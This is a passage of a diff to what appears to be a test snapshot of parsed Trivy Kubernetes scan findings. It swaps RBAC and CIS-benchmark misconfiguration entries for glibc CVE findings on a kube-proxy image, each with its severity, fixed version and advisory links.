glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://avd.aquasec.com/nvd/cve-2021-27645", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/security/cve/CVE-2021-27645", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:namespace-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV046", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv046", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits specific verb on wildcard resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:namespace-controller", - "mitigation": "Create a role which does not permit specific verb on wildcard resources", - "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv046", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://linux.oracle.com/cve/CVE-2021-27645.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:persistent-volume-binder' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:persistent-volume-binder", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:persistent-volume-binder' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:persistent-volume-binder", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:controller:persistent-volume-binder' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:persistent-volume-binder' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:persistent-volume-binder", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:controller:persistent-volume-binder' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://security.gentoo.org/glsa/202107-07", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:replicaset-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:replicaset-controller", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-27645", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:resourcequota-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV046", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33574", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv046", + "https://access.redhat.com/security/cve/CVE-2021-33574", + "https://linux.oracle.com/cve/CVE-2021-33574.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210629-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", + "https://www.cve.org/CVERecord?id=CVE-2021-33574", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits specific verb on wildcard resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:resourcequota-controller", - "mitigation": "Create a role which does not permit specific verb on wildcard resources", - "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", + "category": "Vulnerability", + "description": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: mq_notify does not handle separately allocated thread attributes", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv046", + "value": "https://avd.aquasec.com/nvd/cve-2021-33574", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/security/cve/CVE-2021-33574", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:replication-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:replication-controller", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://linux.oracle.com/cve/CVE-2021-33574.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:root-ca-cert-publisher' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:root-ca-cert-publisher", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(ClusterRole 'system:controller:root-ca-cert-publisher' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + }, { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://security.netapp.com/advisory/ntap-20210629-0005/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33574", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-35942", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", + "https://access.redhat.com/security/cve/CVE-2021-35942", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", + "https://linux.oracle.com/cve/CVE-2021-35942.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", + "https://security.gentoo.org/glsa/202208-24", + "https://security.netapp.com/advisory/ntap-20210827-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", + "https://sourceware.org/glibc/wiki/Security%20Exceptions", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5699-1", + "https://www.cve.org/CVERecord?id=CVE-2021-35942", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", + "category": "Vulnerability", + "description": "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: Arbitrary read in wordexp()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://avd.aquasec.com/nvd/cve-2021-35942", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV046", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv046", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits specific verb on wildcard resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", - "mitigation": "Create a role which does not permit specific verb on wildcard resources", - "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv046", + "value": "https://access.redhat.com/security/cve/CVE-2021-35942", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:kube-controller-manager' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://linux.oracle.com/cve/CVE-2021-35942.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:kube-controller-manager' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:kube-scheduler' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-scheduler", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:kube-scheduler' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://security.netapp.com/advisory/ntap-20210827-0005/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:kube-scheduler' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-scheduler", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:kube-scheduler' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:node' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:node", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://sourceware.org/glibc/wiki/Security%20Exceptions", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRoleBinding/trivy-k8s' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV111", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv111", - ], - }, - "category": "Misconfiguration", - "description": "The RBAC role cluster-admin provides wide-ranging powers over the environment and should be used only where and when needed.", - "location": "scb://trivy/?Kind=ClusterRoleBinding&Name=trivy-k8s", - "mitigation": "Identify all clusterrolebindings to the cluster-admin role. Check if they are used and if they need this role or if they could use a role with fewer privileges.", - "name": "Ensure that the cluster-admin role is only used where required(ClusterRoleBinding 'trivy-k8s' with role 'cluster-admin' should be used only when required)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv111", + "value": "https://ubuntu.com/security/notices/USN-5699-1", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-35942", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0056", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-23218", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0056", + "https://access.redhat.com/security/cve/CVE-2022-23218", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", + "https://linux.oracle.com/cve/CVE-2022-23218.html", + "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", + "https://security.gentoo.org/glsa/202208-24", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2022-23218", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, - "category": "Misconfiguration", - "description": "Ensure that the container network interface file has permissions of 600 or more restrictive.", - "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", - "mitigation": "Change the container network interface file path/to/cni/files permissions of 600 or more restrictive ", - "name": "Ensure that the container network interface file permissions are set to 600 or more restrictive(Ensure that the Container Network Interface specification file permissions is set to 600 or more restrictive)", + "category": "Vulnerability", + "description": "The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: Stack-based buffer overflow in svcunix_create via long pathnames", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0056", + "value": "https://avd.aquasec.com/nvd/cve-2022-23218", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://access.redhat.com/security/cve/CVE-2022-23218", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0059", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0059", - ], - }, - "category": "Misconfiguration", - "description": "Ensure that the etcd data directory ownership is set to etcd:etcd.", - "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", - "mitigation": "Change the etcd data directory /var/lib/etcd ownership to etcd:etcd", - "name": "Ensure that the etcd data directory ownership is set to etcd:etcd(Ensure that the etcd data directory ownership is set to etcd:etcd)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0059", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://linux.oracle.com/cve/CVE-2022-23218.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0068", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0068", - ], - }, - "category": "Misconfiguration", - "description": "Ensure that the Kubernetes PKI certificate file permission is set to 600.", - "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", - "mitigation": "Change the Kubernetes PKI certificate file /etc/kubernetes/pki/*.crt permission to 600", - "name": "Ensure that the Kubernetes PKI certificate file permission is set to 600(Ensure that the Kubernetes PKI certificate file permission is set to 600)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0068", + "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0069", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0069", - ], - }, - "category": "Misconfiguration", - "description": "Ensure that the kubelet service file has permissions of 600 or more restrictive.", - "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", - "mitigation": "Change the kubelet service file /etc/systemd/system/kubelet.service.d/10-kubeadm.conf permissions of 600 or more restrictive ", - "name": "Ensure that the kubelet service file permissions are set to 600 or more restrictive(Ensure that the kubelet service file permissions are set to 600 or more restrictive)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0069", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://security.gentoo.org/glsa/202208-24", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 